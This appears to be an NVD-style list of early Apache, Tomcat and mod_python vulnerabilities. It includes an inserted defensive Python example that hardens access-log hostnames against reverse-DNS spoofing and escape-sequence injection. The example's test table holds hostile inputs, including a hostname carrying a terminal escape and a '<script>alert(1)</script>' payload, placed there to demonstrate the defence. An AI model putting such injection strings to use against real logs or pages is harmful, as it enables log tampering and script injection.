CVE-2002-2012 MEDIUM

Unknown vulnerability in Apache 1.3.19 running on HP Secure OS for Linux 1.0 allows remote attackers to cause "unexpected results" via an HTTP request.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 1.3.19
CVE-2002-2029 HIGH

PHP, when installed on Windows with Apache and ScriptAlias for /php/ set to c:/php/, allows remote attackers to read arbitrary files and possibly execute arbitrary programs via an HTTP request for php.exe with a filename in the query string.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 1.3.19
apache http_server 1.3.11
apache http_server 1.3.12
apache http_server 1.3.14
apache http_server 1.3.13
apache http_server 1.3.20
apache http_server 1.3.17
apache http_server 1.3.18
apache http_server 1.3.15
apache http_server 1.3.16
CVE-2002-2103 MEDIUM

Apache before 1.3.24, when writing to the log file, records a spoofed hostname from the reverse lookup of an IP address, even when a double-reverse lookup fails, which allows remote attackers to hide the original source of activities.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 1.3.19
apache http_server 1.3.11
apache http_server 1.3.23
apache http_server 1.3.9
apache http_server 1.3.17
apache http_server 1.3.12
apache http_server 1.3.22
apache http_server 1.3.14
apache http_server 1.3.13
apache http_server 1.3.20
apache http_server 1.3.18
apache http_server 1.3.15
apache http_server 1.3.16
CVE-2002-2272 HIGH

Tomcat 4.0 through 4.1.12, using mod_jk 1.2.1 module on Apache 1.3 through 1.3.27, allows remote attackers to cause a denial of service (desynchronized communications) via an HTTP GET request with a Transfer-Encoding chunked field with invalid values.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-119,

Products Affected

Vendor Product Version
apache tomcat 4.1.2
apache http_server 1.3.19
apache tomcat 4.0.0
apache tomcat 4.1.1
apache tomcat 4.1.10
apache tomcat 4.0.4
apache tomcat 4.1.12
apache http_server 1.3.22
apache http_server 1.3.10
apache http_server 1.3.14
apache http_server 1.3.15
apache http_server 1.3.16
apache http_server 1.3.27
apache tomcat 4.0.3
apache tomcat 4.0.2
apache tomcat 4.0.6
apache http_server 1.3.11
apache http_server 1.3.23
apache http_server 1.3.24
apache http_server 1.3.25
apache http_server 1.3.1
apache tomcat 4.0.5
apache http_server 1.3.17
apache http_server 1.3.26
apache tomcat 4.0.1
apache http_server 1.3
apache tomcat 4.1.9
apache tomcat 4.1.0
apache http_server 1.3.12
apache http_server 1.3.13
apache http_server 1.3.20
apache http_server 1.3.2
apache http_server 1.3.0
apache http_server 1.3.18
apache tomcat 4.1.3
CVE-2003-0016 HIGH

Apache before 2.0.44, when running on unpatched Windows 9x and Me operating systems, allows remote attackers to cause a denial of service or execute arbitrary code via an HTTP request containing MS-DOS device names.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 2.0.42
apache http_server 2.0.43
apache http_server 2.0.38
apache http_server 2.0.41
apache http_server 2.0.39
apache http_server 2.0.40
apache http_server 2.0.37
apache http_server 2.0.36
CVE-2003-0017 MEDIUM

Apache 2.0 before 2.0.44 on Windows platforms allows remote attackers to obtain certain files via an HTTP request that ends in certain illegal characters such as ">", which causes a different filename to be processed and served.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 2.0.42
apache http_server 2.0.43
apache http_server 2.0.38
apache http_server 2.0.41
apache http_server 2.0.39
apache http_server 2.0.40
apache http_server 2.0.37
apache http_server 2.0.36
CVE-2003-0020 MEDIUM

Apache does not filter terminal escape sequences from its error logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server *
CVE-2003-0042 MEDIUM

Jakarta Tomcat before 3.3.1a, when used with JDK 1.3.1 or earlier, allows remote attackers to list directories even with an index.html or other file present, or obtain unprocessed source code for a JSP file, via a URL containing a null character.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 3.3.1
apache tomcat 3.1
apache tomcat 3.3
apache tomcat 3.1.1
apache tomcat 3.2.4
apache tomcat 3.2.1
apache tomcat 3.0
apache tomcat 3.2
apache tomcat 3.2.3
CVE-2003-0043 MEDIUM

Jakarta Tomcat before 3.3.1a, when used with JDK 1.3.1 or earlier, uses trusted privileges when processing the web.xml file, which could allow remote attackers to read portions of some files through the web.xml file.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 3.3.1
apache tomcat 3.1
apache tomcat 3.3
apache tomcat 3.1.1
apache tomcat 3.2.4
apache tomcat 3.2.1
apache tomcat 3.0
apache tomcat 3.2
apache tomcat 3.2.3
CVE-2003-0044 MEDIUM

Multiple cross-site scripting (XSS) vulnerabilities in the (1) examples and (2) ROOT web applications for Jakarta Tomcat 3.x through 3.3.1a allow remote attackers to insert arbitrary web script or HTML.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 3.3.1
apache tomcat 3.1
apache tomcat 3.3
apache tomcat 3.1.1
apache tomcat 3.2.4
apache tomcat 3.2.1
apache tomcat 3.3.1a
apache tomcat 3.0
apache tomcat 3.2
apache tomcat 3.2.3
CVE-2003-0045 MEDIUM

Jakarta Tomcat before 3.3.1a on certain Windows systems may allow remote attackers to cause a denial of service (thread hang and resource consumption) via a request for a JSP page containing an MS-DOS device name, such as aux.jsp.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 3.3.1
apache tomcat 3.1
apache tomcat 3.3
apache tomcat 3.1.1
apache tomcat 3.2.4
apache tomcat 3.2.1
apache tomcat 3.0
apache tomcat 3.2
apache tomcat 3.2.3
CVE-2003-0083 MEDIUM

Apache 1.3 before 1.3.25 and Apache 2.0 before version 2.0.46 does not filter terminal escape sequences from its access logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences, a different vulnerability than CVE-2003-0020.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server *
CVE-2003-0132 MEDIUM

A memory leak in Apache 2.0 through 2.0.44 allows remote attackers to cause a denial of service (memory consumption) via large chunks of linefeed characters, which causes Apache to allocate 80 bytes for each linefeed.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-772,

Products Affected

Vendor Product Version
apache http_server *
CVE-2003-0134 MEDIUM

Unknown vulnerability in filestat.c for Apache running on OS2, versions 2.0 through 2.0.45, allows unknown attackers to cause a denial of service via requests related to device names.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 2.0.42
apache http_server 2.0.43
apache http_server 2.0.32
apache http_server 2.0.38
apache http_server 2.0.39
apache http_server 2.0.40
apache http_server 2.0.35
apache http_server 2.0.36
apache http_server 2.0
apache http_server 2.0.9
apache http_server 2.0.41
apache http_server 2.0.44
apache http_server 2.0.45
apache http_server 2.0.28
apache http_server 2.0.37
CVE-2003-0189 MEDIUM

The authentication module for Apache 2.0.40 through 2.0.45 on Unix is not thread-safe when calling the crypt_r or crypt functions, which allows remote attackers to cause a denial of service (failed Basic authentication with valid usernames and passwords) when a threaded MPM is used.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 2.0.42
apache http_server 2.0.43
apache http_server 2.0.41
apache http_server 2.0.40
apache http_server 2.0.44
apache http_server 2.0.45
CVE-2003-0192 MEDIUM

Apache 2 before 2.0.47, and certain versions of mod_ssl for Apache 1.3, do not properly handle "certain sequences of per-directory renegotiations and the SSLCipherSuite directive being used to upgrade from a weak ciphersuite to a strong one," which could cause Apache to use the weak ciphersuite.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 2.0.42
apache http_server 2.0.43
apache http_server 2.0.32
apache http_server 2.0.38
apache http_server 2.0.39
apache http_server 2.0.40
apache http_server 2.0.35
apache http_server 2.0.36
apache http_server 2.0.46
apache http_server 2.0
apache http_server 2.0.41
apache http_server 2.0.44
apache http_server 2.0.45
apache http_server 2.0.28
apache http_server 2.0.37
CVE-2003-0245 MEDIUM

Vulnerability in the apr_psprintf function in the Apache Portable Runtime (APR) library for Apache 2.0.37 through 2.0.45 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via long strings, as demonstrated using XML objects to mod_dav, and possibly other vectors.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 2.0.42
apache http_server 2.0.43
apache http_server 2.0.38
apache http_server 2.0.41
apache http_server 2.0.39
apache http_server 2.0.40
apache http_server 2.0.44
apache http_server 2.0.45
apache http_server 2.0.37
CVE-2003-0253 MEDIUM

The prefork MPM in Apache 2 before 2.0.47 does not properly handle certain errors from accept, which could lead to a denial of service.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 2.0.42
apache http_server 2.0.43
apache http_server 2.0.32
apache http_server 2.0.38
apache http_server 2.0.39
apache http_server 2.0.40
apache http_server 2.0.35
apache http_server 2.0.36
apache http_server 2.0.46
apache http_server 2.0
apache http_server 2.0.41
apache http_server 2.0.44
apache http_server 2.0.45
apache http_server 2.0.28
apache http_server 2.0.37
CVE-2003-0254 MEDIUM

Apache 2 before 2.0.47, when running on an IPv6 host, allows attackers to cause a denial of service (CPU consumption by infinite loop) when the FTP proxy server fails to create an IPv6 socket.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 2.0.42
apache http_server 2.0.43
apache http_server 2.0.32
apache http_server 2.0.38
apache http_server 2.0.39
apache http_server 2.0.40
apache http_server 2.0.35
apache http_server 2.0.36
apache http_server 2.0.46
apache http_server 2.0
apache http_server 2.0.41
apache http_server 2.0.44
apache http_server 2.0.45
apache http_server 2.0.28
apache http_server 2.0.37
CVE-2003-0460 MEDIUM

The rotatelogs program on Apache before 1.3.28, for Windows and OS/2 systems, does not properly ignore certain control characters that are received over the pipe, which could allow remote attackers to cause a denial of service.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server *
CVE-2003-0542 HIGH

Multiple stack-based buffer overflows in (1) mod_alias and (2) mod_rewrite for Apache before 1.3.29 allow attackers to create configuration files to cause a denial of service (crash) or execute arbitrary code via a regular expression with more than 9 captures.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-119,

Products Affected

Vendor Product Version
apache http_server 1.3.19
apache http_server 2.0.39
apache http_server 1.3.4
apache http_server 2.0.36
apache http_server 2.0
apache http_server 1.3.22
apache http_server 1.3.14
apache http_server 2.0.41
apache http_server 2.0.44
apache http_server 1.3.27
apache http_server 2.0.47
apache http_server 2.0.42
apache http_server 2.0.43
apache http_server 1.3.11
apache http_server 1.3.23
apache http_server 1.3.24
apache http_server 1.3.25
apache http_server 2.0.32
apache http_server 2.0.38
apache http_server 1.3.9
apache http_server 1.3.1
apache http_server 2.0.40
apache http_server 1.3.17
apache http_server 1.3.26
apache http_server 1.3.6
apache http_server 1.3
apache http_server 2.0.35
apache http_server 2.0.46
apache http_server 1.3.12
apache http_server 1.3.28
apache http_server 1.3.20
apache http_server 2.0.45
apache http_server 1.3.18
apache http_server 2.0.28
apache http_server 2.0.37
apache http_server 1.3.3
CVE-2003-0789 HIGH

mod_cgid in Apache before 2.0.48, when using a threaded MPM, does not properly handle CGI redirect paths, which could cause Apache to send the output of a CGI program to the wrong client.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache http_server *
CVE-2003-0866 MEDIUM

The Catalina org.apache.catalina.connector.http package in Tomcat 4.0.x up to 4.0.3 allows remote attackers to cause a denial of service via several requests that do not follow the HTTP protocol, which causes Tomcat to reject later requests.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 4.0.0
apache tomcat 4.0.5
apache tomcat 4.0.1
apache tomcat 4.0.3
apache tomcat 4.0.2
apache tomcat 4.0.4
apache tomcat 4.0.6
CVE-2003-0973 MEDIUM

Unknown vulnerability in mod_python 3.0.x before 3.0.4, and 2.7.x before 2.7.9, allows remote attackers to cause a denial of service (httpd crash) via a certain query string.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache mod_python 2.7
apache mod_python 2.7.7
apache mod_python 3.0.1
apache mod_python 2.7.5
apache mod_python 3.0.2
apache mod_python 2.7.3
apache mod_python 2.7.6
apache mod_python 2.7.2
apache mod_python 2.7.1
apache mod_python 2.7.8
apache mod_python 3.0.3
apache mod_python 2.7.4
apache mod_python 3.0
CVE-2003-0987 HIGH

mod_digest for Apache before 1.3.31 does not properly verify the nonce of a client response against the AuthNonce secret, which allows remote attackers to replay digest credentials (compare CVE-2004-1082).

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server *
CVE-2003-0993 HIGH

mod_access in Apache 1.3 before 1.3.30, when running on big-endian 64-bit platforms, does not properly parse Allow/Deny rules using IP addresses without a netmask, which could allow remote attackers to bypass intended access restrictions.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 1.3.19
apache http_server 1.3.11
apache http_server 1.3.23
apache http_server 1.3.24
apache http_server 1.3.25
apache http_server 1.3.9
apache http_server 1.3.1
apache http_server 1.3.17
apache http_server 1.3.26
apache http_server 1.3.4
apache http_server 1.3.6
apache http_server 1.3
apache http_server 1.3.7
apache http_server 1.3.12
apache http_server 1.3.22
apache http_server 1.3.14
apache http_server 1.3.28
apache http_server 1.3.20
apache http_server 1.3.18
apache http_server 1.3.29
apache http_server 1.3.27
apache http_server 1.3.3
CVE-2003-1172 MEDIUM

Directory traversal vulnerability in the view-source sample file in Apache Software Foundation Cocoon 2.1 and 2.2 allows remote attackers to access arbitrary files via a .. (dot dot) in the filename parameter.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache cocoon 2.2
apache cocoon 2.1
apache cocoon 2.1.2
CVE-2003-1307 MEDIUM

The mod_php module for the Apache HTTP Server allows local users with write access to PHP scripts to send signals to the server's process group and use the server's file descriptors, as demonstrated by sending a STOP signal, then intercepting incoming connections on the server's TCP port. NOTE: the PHP developer has disputed this vulnerability, saying "The opened file descriptors are opened by Apache. It is the job of Apache to protect them ... Not a bug in PHP."

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 2.0.42
apache http_server 2.0.43
apache http_server 2.0.32
apache http_server 2.0.38
apache http_server 2.0.39
apache http_server 2.0.40
apache http_server 2.0.48
apache http_server 2.0.35
apache http_server 2.0.36
apache http_server 2.0.46
apache http_server 2.0
apache http_server 2.0.9
apache http_server 2.0.41
apache http_server 2.0.44
apache http_server 2.0.45
apache http_server 2.0.34
apache http_server 2.0.28
apache http_server 2.0.37
apache http_server 2.0.47
CVE-2003-1418 MEDIUM

Apache HTTP Server 1.3.22 through 1.3.27 on OpenBSD allows remote attackers to obtain sensitive information via (1) the ETag header, which reveals the inode number, or (2) multipart MIME boundary, which reveals child process IDs (PID).

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache http_server 1.3.23
apache http_server 1.3.24
apache http_server 1.3.22
apache http_server 1.3.25
apache http_server 1.3.26
apache http_server 1.3.27
CVE-2003-1580 MEDIUM

The Apache HTTP Server 2.0.44, when DNS resolution is enabled for client IP addresses, uses a logging format that does not identify whether a dotted quad represents an unresolved IP address, which allows remote attackers to spoof IP addresses via crafted DNS responses containing numerical top-level domains, as demonstrated by a forged 123.123.123.123 domain name, related to an "Inverse Lookup Log Corruption (ILLC)" issue.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-189,

Products Affected

Vendor Product Version
apache http_server 2.0.44
CVE-2003-1581 LOW

The Apache HTTP Server 2.0.44, when DNS resolution is enabled for client IP addresses, allows remote attackers to inject arbitrary text into log files via an HTTP request in conjunction with a crafted DNS response, as demonstrated by injecting XSS sequences, related to an "Inverse Lookup Log Corruption (ILLC)" issue.

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache http_server 2.0.44
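CVE-2002-2103, CVE-2003-1580 and CVE-2003-1581 above are three faces of one mistake: trusting a reverse DNS answer that the remote party controls and writing it into a log as if it were data the server had verified, and CVE-2003-0020 and CVE-2003-0083 are the related failure to escape what ends up in the log. The block below is an added example (not httpd's logging code) of a client field that forward-confirms the PTR name, refuses names that would read as an IP address, and escapes control bytes and quotes the way httpd does since the fixes (a `\xhh` form). The DNS answers are a constructed, hypothetical table standing in for a resolver.

```python
"""Hardened client identification for an access log.

Added example, not httpd's code. PTR and A below are a constructed stand-in
for the resolver: 203.0.113.0/24 and 198.51.100.0/24 are documentation
ranges, and the names are hypothetical."""
import ipaddress
import re

PTR = {
    "203.0.113.7": "www.example.com",               # honest: forward matches
    "203.0.113.8": "admin.bank.example",            # spoofed PTR, forward disagrees
    "203.0.113.9": "123.123.123.123",               # numeric "hostname" (ILLC)
    "203.0.113.10": "evil\x1b[2J<script>alert(1)</script>.example",
}
A = {
    "www.example.com": {"203.0.113.7"},
    "admin.bank.example": {"198.51.100.1"},
    "123.123.123.123": {"203.0.113.9"},             # attacker controls forward too
    "evil\x1b[2J<script>alert(1)</script>.example": {"203.0.113.10"},
}

# One DNS label: letters, digits, interior hyphens, 1..63 chars.
_LABEL = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")


def double_reverse(ip, ptr=PTR, a=A):
    """Forward-confirmed reverse DNS: accept the PTR name only if one of its
    A records maps back to the same address. Returns None otherwise."""
    name = ptr.get(ip)
    if name is None or ip not in a.get(name, ()):
        return None
    return name


def looks_like_ip(name):
    """True if the string would be read as an IPv4/IPv6 address."""
    try:
        ipaddress.ip_address(name)
        return True
    except ValueError:
        return False


def is_valid_hostname(name):
    """Syntactic hostname check; an all-digit top-level label is refused
    because it lets a name masquerade as a dotted quad in the log."""
    labels = name.rstrip(".").split(".")
    return (len(name) <= 253
            and all(_LABEL.match(label) for label in labels)
            and not labels[-1].isdigit())


def sanitize(field):
    """Escape backslash, double quote and every byte outside printable
    ASCII as \\xhh, so terminal escapes and markup never reach a log
    viewer raw. Non-ASCII is escaped per UTF-8 byte."""
    out = []
    for b in field.encode("utf-8"):
        if b == 0x5C:
            out.append("\\\\")
        elif b == 0x22:
            out.append('\\"')
        elif 0x20 <= b < 0x7F:
            out.append(chr(b))
        else:
            out.append("\\x%02x" % b)
    return "".join(out)


def client_field(ip, ptr=PTR, a=A):
    """What goes in the client column: the verified hostname, or the bare
    IP whenever verification fails or the name is not a plain hostname."""
    name = double_reverse(ip, ptr, a)
    if name is None or looks_like_ip(name) or not is_valid_hostname(name):
        return ip
    return sanitize(name)


def format_log_line(ip, request_line, when="10/Oct/2000:13:55:36 -0700"):
    """Common Log Format line with both attacker-influenced fields escaped."""
    return '%s - - [%s] "%s" 200 0' % (client_field(ip), when,
                                        sanitize(request_line))


if __name__ == "__main__":
    for ip in PTR:
        print(format_log_line(ip, "GET /\x1b[2J HTTP/1.0"))
```

If the log is consumed by tooling rather than people, the simplest robust option remains HostnameLookups Off with the IP written as-is, resolving offline at analysis time; the escaping still matters for the request line and User-Agent, which the client controls directly.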
CVE-2004-0096 MEDIUM

Unknown vulnerability in mod_python 2.7.9 allows remote attackers to cause a denial of service (httpd crash) via a certain query string, a variant of CAN-2003-0973.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache mod_python 2.7.9
CVE-2004-0113 MEDIUM

Memory leak in ssl_engine_io.c for mod_ssl in Apache 2 before 2.0.49 allows remote attackers to cause a denial of service (memory consumption) via plain HTTP requests to the SSL port of an SSL-enabled server.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 2.0.42
apache http_server 2.0.43
apache http_server 2.0.38
apache http_server 2.0.39
apache http_server 2.0.40
apache http_server 2.0.48
apache http_server 2.0.35
apache http_server 2.0.36
apache http_server 2.0.46
apache http_server 2.0.41
apache http_server 2.0.44
apache http_server 2.0.45
apache http_server 2.0.37
apache http_server 2.0.47
CVE-2004-0173 MEDIUM

Directory traversal vulnerability in Apache 1.3.29 and earlier, and Apache 2.0.48 and earlier, when running on Cygwin, allows remote attackers to read arbitrary files via a URL containing "..%5C" (dot dot encoded backslash) sequences.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 1.0
apache http_server 1.0.2
apache http_server 1.0.5
apache http_server 1.1.1
apache http_server 0.8.14
apache http_server 1.0.3
apache http_server 1.2.5
apache http_server 1.3
apache http_server 0.8.11
apache http_server 1.1
apache http_server 1.2
CVE-2004-0174 MEDIUM

Apache 1.3.x before 1.3.30, and 2.0.x before 2.0.49, when using multiple listening sockets on certain platforms, allows remote attackers to cause a denial of service (blocked new connections) via a "short-lived connection on a rarely-accessed listening socket."

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-667,

Products Affected

Vendor Product Version
apache http_server *
CVE-2004-0263 MEDIUM

PHP 4.3.4 and earlier in Apache 1.x and 2.x (mod_php) can leak global variables between virtual hosts that are handled by the same Apache child process but have different settings, which could allow remote attackers to obtain sensitive information.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 1.3.19
apache http_server 1.0.2
apache http_server 1.0.5
apache http_server 1.3.4
apache http_server 2.0.36
apache http_server 1.1
apache http_server 1.3.14
apache http_server 1.1.1
apache http_server 2.0.44
apache http_server 1.3.29
apache http_server 1.3.27
apache http_server 2.0.47
apache http_server 1.3.23
apache http_server 1.3.24
apache http_server 2.0.32
apache http_server 1.3.9
apache http_server 1.3.1
apache http_server 2.0.40
apache http_server 2.0.48
apache http_server 2.0.35
apache http_server 2.0.46
apache http_server 1.3.7
apache http_server 1.3.12
apache http_server 1.3.20
ibm http_server 1.3.19
apache http_server 2.0.45
apache http_server 1.3.18
apache http_server 2.0.37
apache http_server 2.0.39
apache http_server 2.0
apache http_server 1.3.22
apache http_server 2.0.9
apache http_server 2.0.41
apache http_server 2.0.42
apache http_server 2.0.43
apache http_server 1.0
apache http_server 1.3.11
apache http_server 1.3.25
apache http_server 2.0.38
apache http_server 1.3.17
apache http_server 1.3.26
apache http_server 1.0.3
apache http_server 1.3.6
apache http_server 1.3
apache http_server 1.2
apache http_server 1.3.28
apache http_server 1.2.5
apache http_server 2.0.28
apache http_server 1.3.3
CVE-2004-0488 HIGH

Stack-based buffer overflow in the ssl_util_uuencode_binary function in ssl_util.c for Apache mod_ssl, when mod_ssl is configured to trust the issuing CA, may allow remote attackers to execute arbitrary code via a client certificate with a long subject DN.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-787,

Products Affected

Vendor Product Version
redhat enterprise_linux_server 2.0
apache http_server *
debian debian_linux 3.0
redhat enterprise_linux_workstation 2.0
CVE-2004-0492 HIGH

Heap-based buffer overflow in proxy_util.c for mod_proxy in Apache 1.3.25 to 1.3.31 allows remote attackers to cause a denial of service (process crash) and possibly execute arbitrary code via a negative Content-Length HTTP header field, which causes a large amount of data to be copied.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
ibm http_server 1.3.26.2
apache http_server 1.3.31
apache http_server 1.3.26
sgi propack 2.4
hp webproxy 2.0
openbsd openbsd *
hp vvos 11.04
hp virtualvault 11.0.4
apache http_server 1.3.28
ibm http_server 1.3.28
hp webproxy 2.1
openbsd openbsd 3.5
apache http_server 1.3.29
openbsd openbsd 3.4
apache http_server 1.3.27
ibm http_server 1.3.26
ibm http_server 1.3.26.1
CVE-2004-0493 MEDIUM

The ap_get_mime_headers_core function in Apache httpd 2.0.49 allows remote attackers to cause a denial of service (memory exhaustion), and possibly an integer signedness error leading to a heap-based buffer overflow on 64 bit systems, via long header lines with large numbers of space or tab characters.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
ibm http_server 2.0.42.1
ibm http_server 2.0.47
avaya s8300 r2.0.0
gentoo linux 1.4
trustix secure_linux 1.5
apache http_server 2.0.48
apache http_server 2.0.49
avaya s8700 r2.0.0
avaya converged_communications_server 2.0
ibm http_server 2.0.42
ibm http_server 2.0.42.2
trustix secure_linux 2.1
avaya s8500 r2.0.0
ibm http_server 2.0.47.1
apache http_server 2.0.47
trustix secure_linux 2.0
CVE-2004-0747 MEDIUM

Buffer overflow in Apache 2.0.50 and earlier allows local users to gain apache privileges via a .htaccess file that causes the overflow during expansion of environment variables.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 1.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-131,

Products Affected

Vendor Product Version
apache http_server *
CVE-2004-0748 MEDIUM

mod_ssl in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (CPU consumption) by aborting an SSL connection in a way that causes an Apache child process to enter an infinite loop.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-835,

Products Affected

Vendor Product Version
apache http_server *
CVE-2004-0751 MEDIUM

The char_buffer_read function in the mod_ssl module for Apache 2.x, when using reverse proxying to an SSL server, allows remote attackers to cause a denial of service (segmentation fault).

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache http_server *
CVE-2004-0786 MEDIUM

The IPv6 URI parsing routines in the apr-util library for Apache 2.0.50 and earlier allow remote attackers to cause a denial of service (child process crash) via a certain URI, as demonstrated using the Codenomicon HTTP Test Tool.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache http_server *
CVE-2004-0809 MEDIUM

The mod_dav module in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (child process crash) via a certain sequence of LOCK requests for a location that allows WebDAV authoring access.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
hp secure_web_server_for_tru64 5.1
apache http_server *
hp hp-ux 11.00
hp secure_web_server_for_tru64 5.8.1
turbolinux turbolinux_server 10.0
gentoo linux 1.4
redhat enterprise_linux_desktop 3.0
hp hp-ux 11.11
mandrakesoft mandrake_linux 10.0
debian debian_linux 3.0
redhat enterprise_linux 3.0
hp hp-ux 11.22
hp secure_web_server_for_tru64 5.1_a
hp secure_web_server_for_tru64 6.3.0
hp secure_web_server_for_tru64 5.0_a
turbolinux turbolinux_desktop 10.0
hp secure_web_server_for_tru64 5.9.1
hp hp-ux 11.23
turbolinux turbolinux_home *
mandrakesoft mandrake_linux 9.2
trustix secure_linux 2.1
hp secure_web_server_for_tru64 4.0_g
hp secure_web_server_for_tru64 5.9.2
hp secure_web_server_for_tru64 4.0_f
hp secure_web_server_for_tru64 5.8.2
trustix secure_linux 2.0
CVE-2004-0811 HIGH

Unknown vulnerability in Apache 2.0.51 prevents "the merging of the Satisfy directive," which could allow attackers to obtain access to restricted resources contrary to the specified authentication configuration.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 2.0.51
CVE-2004-0885 HIGH

The mod_ssl module in Apache 2.0.35 through 2.0.52, when using the "SSLCipherSuite" directive in directory or location context, allows remote clients to bypass intended restrictions by using any cipher suite that is allowed by the virtual host configuration.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 2.0.42
apache http_server 2.0.43
apache http_server 2.0.38
apache http_server 2.0.52
apache http_server 2.0.39
apache http_server 2.0.40
apache http_server 2.0.48
apache http_server 2.0.49
apache http_server 2.0.35
apache http_server 2.0.36
apache http_server 2.0.46
apache http_server 2.0.41
apache http_server 2.0.50
apache http_server 2.0.44
apache http_server 2.0.45
apache http_server 2.0.51
apache http_server 2.0.37
apache http_server 2.0.47
CVE-2004-0940 MEDIUM

Buffer overflow in the get_tag function in mod_include for Apache 1.3.x to 1.3.32 allows local users who can create SSI documents to execute arbitrary code as the apache user via SSI (XSSI) documents that trigger a length calculation error.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 1.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-131,

Products Affected

Vendor Product Version
apache http_server *
suse suse_linux 9.0
hp hp-ux 11.00
suse suse_linux 9.2
slackware slackware_linux 10.0
slackware slackware_linux 9.0
suse suse_linux 8.1
trustix secure_linux 1.5
hp hp-ux 11.11
openpkg openpkg 2.1
slackware slackware_linux current
slackware slackware_linux 9.1
hp hp-ux 11.22
suse suse_linux 8.0
slackware slackware_linux 8.1
suse suse_linux 9.1
openpkg openpkg 2.2
slackware slackware_linux 8.0
suse suse_linux 8.2
openpkg openpkg 2.0
hp hp-ux 11.20
